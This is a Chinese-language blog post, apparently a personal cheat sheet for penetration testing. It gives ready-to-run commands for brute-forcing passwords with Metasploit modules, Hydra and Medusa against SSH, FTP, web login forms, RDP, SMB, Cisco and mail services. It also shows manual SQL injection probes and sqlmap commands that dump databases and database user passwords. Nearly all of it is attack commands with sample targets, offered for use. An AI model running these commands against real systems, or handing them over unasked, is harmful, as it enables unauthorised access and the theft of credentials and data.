• 渗透测试的一些总结


    使用命令: 破解ssh登录名和密码 msconsole回车 search ssh 查找ssh相关的模块 use auxiliary/scanner/ssh/ssh_login 调用ssh破解程序 show options 查看选项 set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通) set rport 22 设置端口 set username root 设置用户名 set pass_file /root/*.* 设置密码文件 set threads 50 设置线程50 run 开始执行 telnet同理, kali自带密码字典路径//usr/share/wordlists/w3af.txt

    Hydra破解
    1、破解ssh:
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
    2、破解ftp:
    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
    3、get方式提交,破解web登录:
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.PHP
    4、post方式提交,破解web登录:
    hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=USER&password=PASS&submit=login:sorry password"

    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=USER&passwd=PASS:wrong username or password"
    (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中的内容是表示错误猜解的返回信息提示。)<br> 5、破解https:<br> hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https<br> 6、破解teamspeak:<br> hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak<br> 7、破解cisco:<br> hydra -P pass.txt 10.36.16.18 cisco<br> hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable<br> 8、破解smb:<br> hydra -l administrator -P pass.txt 10.36.16.18 smb<br> 9、破解pop3:<br> hydra -l muts -P pass.txt my.pop3.mail pop3<br> 10、破解rdp:<br> hydra ip rdp -l administrator -P pass.txt -V<br> 11、破解http-proxy:<br> hydra -l admin -P pass.txt http-proxy://10.36.16.18<br> 12、破解imap:<br> hydra -L user.txt -p secret 10.36.16.18 imap PLAIN<br> hydra -C defaults.txt -6</p> <p>Medusa暴力破解远程<br> kali linux自带破解工具,使用的时候要获得一些必要的信息。<br> 1、目标IP地址<br> 2、登录目标的一个用户名或者一个用户名文件(都是猜测的用户名也可以说是用户名字典)<br> 3、密码字典<br> 4、要验证的服务名称(比如ssh、http、telnet等)<br> 使用命令:<br> medusa -h target_ip(攻击ip) -u username -P path_to_passwordlist(密码文件要打绝对路径) -M authentication_service_to_attack(要验证的服务名称)<br> -u是要攻击的目标的id(用户名)号,如果改为大写的U,将会是利用用户名列表进行攻击,-M参数后面接的是你要攻击的验证服务名称。</p> <p>payload破解<br> search tomcat查看tomcat的payload<br> payload就是加载模块调用攻击的有效加载项。(真心抽象)<br> msfconsole回车<br> use auxiliary/scanner/http/tomcat_mgr_login 调用tomcat破解程序<br> show options 查看选项<br> set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通)<br> set rport 8080 设置端口<br> set username root 设置用户名(set user_file /<em>/</em>.<em>设置帐号字典)<br> set pass_file /root/</em>.* 设置密码字典<br> set threads 50 设置线程50<br> run 开始执行。</p> <hr> <p>sqlmap:数据库注入工具。<br> 可以用来猜测数据库类型和利用漏洞渗透数据库<br> 注入点一般存在登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。<br> 比如:最常用的寻找SQL注入点的方法,是在网站中寻找如下形式的页面链接:<a href="http://www.xxx.com/xxx.asp?id=YY" target="_blank">http://www.xxx.com/xxx.asp?id=YY</a><br> 其中“YY”可能是数字,也有可能是字符串,分别被称为整数类型数据或者字符型数据。<br> 一般有一下几种方法:<br> 1、加 ' 法<br> 浏览器可能会返回类似于下面的错误提示信息:Microsoft JET Database Engine 错误’80040e14表示有注入点。<br> 2、and 1=1 和and 1=2 将and 1=1 写在url最后面访问显示正常,而and 1=2 提示错误说明有可能有注入点。如果两种方式结果一样,就表示没戏。<br> 3、sqlmap下输入 (-u "域名" --level 5 --dbs) 猜测数据库类型<br> Sqlmap参数使用<br> BT5里面的话前面就要加python<br> sqlmap.py -u url --dbs //爆数据库<br> sqlmap.py -u url --current-db //爆当前库<br> sqlmap.py -u url --current-user //爆当前用户<br> sqlmap.py -u url --users 查看用户权限<br> sqlmap.py -u url --tables -D 数据库 //爆表段<br> sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段<br> sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解<br> sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段<br> 加入python环境使用方法:<br> sqlmap.py -u url 判断<br> sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba<br> sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户<br> sqlmap.py -u url --passwords -v 0这句的目的是获取数据库用户的密码<br> sqlmap.py -u url --privileges -v 0 这是判断当前的权限<br> sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来<br> sqlmap.py -u url --tables -D '表' 爆表<br> sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列<br> sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内<br> sqlmap.py -u url --dump -all -v 0 爆数据库<br> sqlmap.py -u url --users --password 爆用户名密码。</p> <hr> </font>

    ...............................................................认真写每篇博客,如同我对待生活............................................................
  • 相关阅读:
    79.Word Search
    78.Subsets
    77.Combinations
    75.Sort Colors
    74.Search a 2D Matrix
    73.Set Matrix Zeroes
    71.Simplify Path
    64.Minimum Path Sum
    63.Unique Paths II
    Docker 拉取 oracle 11g镜像配置
  • 原文地址:https://www.cnblogs.com/itholidaycn/p/6425545.html
Copyright © 2020-2023  润新知